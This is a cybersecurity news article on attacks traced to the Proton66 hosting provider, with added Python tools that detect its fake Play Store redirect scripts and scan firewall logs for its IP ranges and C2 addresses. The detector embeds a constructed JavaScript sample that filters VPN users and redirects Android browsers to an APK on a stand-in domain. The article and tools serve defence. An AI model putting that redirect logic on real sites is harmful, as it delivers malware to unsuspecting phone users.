Cybersecurity researchers have revealed a surge in “mass scanning, credential brute-forcing, and exploitation attempts” originating from IP addresses associated with the Russian hosting provider Proton66.
The activity, detected since January 8, 2025, targeted organizations worldwide, according to a two-part analysis published by Trustwave SpiderLabs last week.
“Net blocks 45.135.232.0/24 and 45.140.17.0/24 were particularly active,” it noted. “Several of the offending IP addresses had not previously been seen engaging in malicious activity or had been inactive for more than two years.”
The Russian autonomous system Proton66 is assessed to be linked to another autonomous system named Prospero. Last year, the French security firm Intrinsec detailed its ties to bulletproof hosting services marketed on Russian cybercrime forums under the names SecureHost and BearHost.
Several malware families, including GootLoader and SpyNote, have hosted their command-and-control (C2) servers and phishing pages on Proton66. Earlier this February, journalist Brian Krebs disclosed that Prospero had begun routing its operations through networks run by the Russian antivirus vendor Kaspersky in Moscow.
Kaspersky, however, denied that it was working with Prospero, stating that “routing through Kaspersky-operated networks is not the default.”
Trustwave's latest analysis found that malicious requests originating from one of the Proton66 net blocks (193.143.1[.]65) in February 2025 attempted to exploit several recent critical vulnerabilities:
- CVE-2025-0108 – authentication bypass vulnerability in Palo Alto Networks PAN-OS
- CVE-2024-41713 – insufficient input validation vulnerability in the NuPoint Unified Messaging (NPM) component of Mitel MiCollab
- CVE-2014-10914 – command injection vulnerability in D-Link NAS devices
- CVE-2024-5591 & CVE-2015-2472 – authentication bypass vulnerabilities in Fortinet FortiOS
It is worth noting that exploitation of the two Fortinet FortiOS flaws has been attributed to an initial access broker dubbed Mora_001, which has been observed delivering a new ransomware strain called SuperBlack.
The cybersecurity firm said it also observed several malware families associated with Proton66, including XWorm, StrelaStealer, and a ransomware named WeaXor.
Another notable activity concerns the use of compromised WordPress websites tied to the Proton66 IP address 91.212.166[.]21 to redirect Android devices to phishing pages that mimic Google Play app listings and trick users into downloading malicious APK files.
The redirection is facilitated by malicious JavaScript hosted on Proton66 IP addresses. Analysis of the fake Play Store domain names suggests the campaign is designed to target French-, Spanish-, and Greek-speaking users.
“The redirection scripts are designed to perform several checks against the victim, such as excluding scanners and VPN or proxy users,” the researchers said. “The user's IP address is obtained through a request to ipify.org, and VPN or proxy use is then verified through a further request to ipinfo.io. Ultimately, the redirect only occurs when an Android browser is detected.”
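The checks quoted above (an ipify.org IP lookup, an ipinfo.io VPN/proxy check, an Android user-agent test, and a redirect to an APK) make a useful static signature for a defender reviewing JavaScript served from a WordPress site. The following heuristic scorer is an added example written for this article, not Trustwave's tooling or any script recovered from the campaign; the two JavaScript samples it scans are constructed here to mirror the described behaviour, and the threshold of three matching indicators is an assumption.

```python
import re

# Each indicator corresponds to one of the checks the report describes.
INDICATORS = {
    "ip_lookup": re.compile(r"ipify\.org", re.I),
    "vpn_proxy_check": re.compile(r"ipinfo\.io", re.I),
    # Android string within the same statement as a userAgent reference, either order.
    "android_ua_test": re.compile(
        r"Android[^\n;]{0,80}userAgent|userAgent[^\n;]{0,80}Android", re.I
    ),
    # Assignment to location/location.href or location.replace() whose target ends in .apk.
    "apk_redirect": re.compile(
        r"location(?:\.href)?\s*=[^\n;]{0,160}\.apk|location\.replace\s*\([^\n;]{0,160}\.apk",
        re.I,
    ),
}

# Constructed sample modelled on the described redirect flow (hypothetical domain).
SAMPLE_REDIRECT_JS = """
fetch('https://api.ipify.org?format=json').then(r => r.json()).then(d => {
  fetch('https://ipinfo.io/' + d.ip + '/json').then(r => r.json()).then(info => {
    if (info.privacy && (info.privacy.vpn || info.privacy.proxy)) return;
    if (/Android/i.test(navigator.userAgent)) {
      window.location.href = 'https://play-store-update.example/app.apk';
    }
  });
});
"""

# Constructed benign snippet: a single geolocation lookup, no redirect.
SAMPLE_BENIGN_JS = """
fetch('https://ipinfo.io/json').then(r => r.json()).then(info => {
  document.getElementById('region').textContent = info.country;
});
"""


def score_script(js: str) -> dict:
    """Return which indicators matched, a total score, and a verdict.

    A script is flagged when at least three of the four indicators co-occur
    (assumed threshold); a lone ipinfo.io call is common in benign analytics.
    """
    hits = {name: bool(rx.search(js)) for name, rx in INDICATORS.items()}
    matched = sum(hits.values())
    hits["score"] = matched
    hits["suspicious"] = matched >= 3
    return hits


if __name__ == "__main__":
    for label, sample in (("redirect", SAMPLE_REDIRECT_JS), ("benign", SAMPLE_BENIGN_JS)):
        print(label, score_script(sample))
```

Run it against JavaScript files pulled from a site's theme and plugin directories; a hit on the redirect sample scores 4, while the benign snippet scores 1 and is left alone.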
Also hosted on one of the Proton66 IP addresses is a ZIP archive that leads to the deployment of the XWorm malware, in a campaign specifically targeting Korean-speaking chat room users through social engineering schemes.
The first stage of the attack is a Windows shortcut (LNK) file that executes a PowerShell command, which then launches a Visual Basic script; that script in turn downloads a Base64-encoded .NET DLL from the same IP address. The DLL then proceeds to download and load the XWorm binary.
Proton66-linked infrastructure was also used to facilitate an email phishing campaign aimed at German-speaking users with StrelaStealer, an information stealer that communicates with the IP address 193.143.1[.]205 for C2.
Last but not least, artifacts of the WeaXor ransomware, a Mallox-related family, were found contacting a C2 server on Proton66 (193.143.1[.]139).
Organizations are advised to block all Classless Inter-Domain Routing (CIDR) ranges associated with Proton66, and with Chang Way Technologies, a likely related Hong Kong-based provider, to neutralize potential threats.
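The blocking advice above is straightforward to operationalize, but a CIDR blocklist is only half of the picture: outbound connections to the individual C2 addresses named in the article are the stronger signal that a host is already infected. The following script is an added example written for this article (not Trustwave's code) that checks firewall log lines against the two net blocks and the four addresses named above, reporting whether a hit was the source or the destination. The log lines and their format are constructed for the example; the per-address notes restate what the article says about each IP.

```python
import ipaddress
import re
from typing import List, Optional, Tuple

# Net blocks the article names as Proton66 ranges (the CIDR blocklist it recommends).
PROTON66_RANGES = [
    ipaddress.ip_network(c) for c in ("45.135.232.0/24", "45.140.17.0/24")
]

# Individual addresses the article names (defanged there), re-fanged for matching.
PROTON66_IOCS = {
    ipaddress.ip_address(addr): note
    for addr, note in (
        ("193.143.1.65", "exploit attempts, Feb 2025"),
        ("91.212.166.21", "WordPress -> fake Play Store redirect"),
        ("193.143.1.205", "StrelaStealer C2"),
        ("193.143.1.139", "WeaXor C2"),
    )
}

# Constructed firewall log lines (hypothetical format, not real telemetry).
SAMPLE_LOGS = """\
2025-02-03T10:12:41Z fw01 accept src=45.135.232.17 dst=10.0.0.5 dport=443
2025-02-03T10:12:44Z fw01 accept src=203.0.113.9 dst=10.0.0.5 dport=443
2025-02-03T10:13:02Z fw01 accept src=10.0.0.22 dst=193.143.1.139 dport=443
2025-02-03T10:13:09Z fw01 drop src=45.140.17.200 dst=10.0.0.5 dport=22
2025-02-03T10:13:15Z fw01 accept src=10.0.0.22 dst=198.51.100.4 dport=80
"""

LOG_RE = re.compile(r"src=(?P<src>\S+) dst=(?P<dst>\S+)")


def classify_ip(ip_str: str) -> Optional[str]:
    """Return a reason if the address is a listed Proton66 IOC or falls in a
    listed range, else None. Specific IOCs are checked before the ranges so
    the more descriptive note wins."""
    try:
        ip = ipaddress.ip_address(ip_str)
    except ValueError:
        return None
    if ip in PROTON66_IOCS:
        return f"ioc: {PROTON66_IOCS[ip]}"
    for net in PROTON66_RANGES:
        if ip in net:
            return f"range: {net}"
    return None


def scan_logs(text: str) -> List[Tuple[str, str, str]]:
    """Return (direction, ip, reason) for every source or destination hit.

    An inbound 'src' hit is scanning or exploitation pressure against the
    perimeter; an outbound 'dst' hit to a C2 address means an internal host
    is likely already compromised and should be escalated first."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.search(line)
        if not m:
            continue
        for direction in ("src", "dst"):
            reason = classify_ip(m.group(direction))
            if reason:
                hits.append((direction, m.group(direction), reason))
    return hits


if __name__ == "__main__":
    for direction, ip, reason in scan_logs(SAMPLE_LOGS):
        print(f"{direction:<3} {ip:<16} {reason}")
```

On the constructed sample this flags two inbound connections from the listed ranges and one outbound connection from 10.0.0.22 to the WeaXor C2 address; the latter is the one worth an immediate host investigation. Extend PROTON66_RANGES with the Chang Way Technologies prefixes from your own routing data if you follow the article's advice to block that provider too.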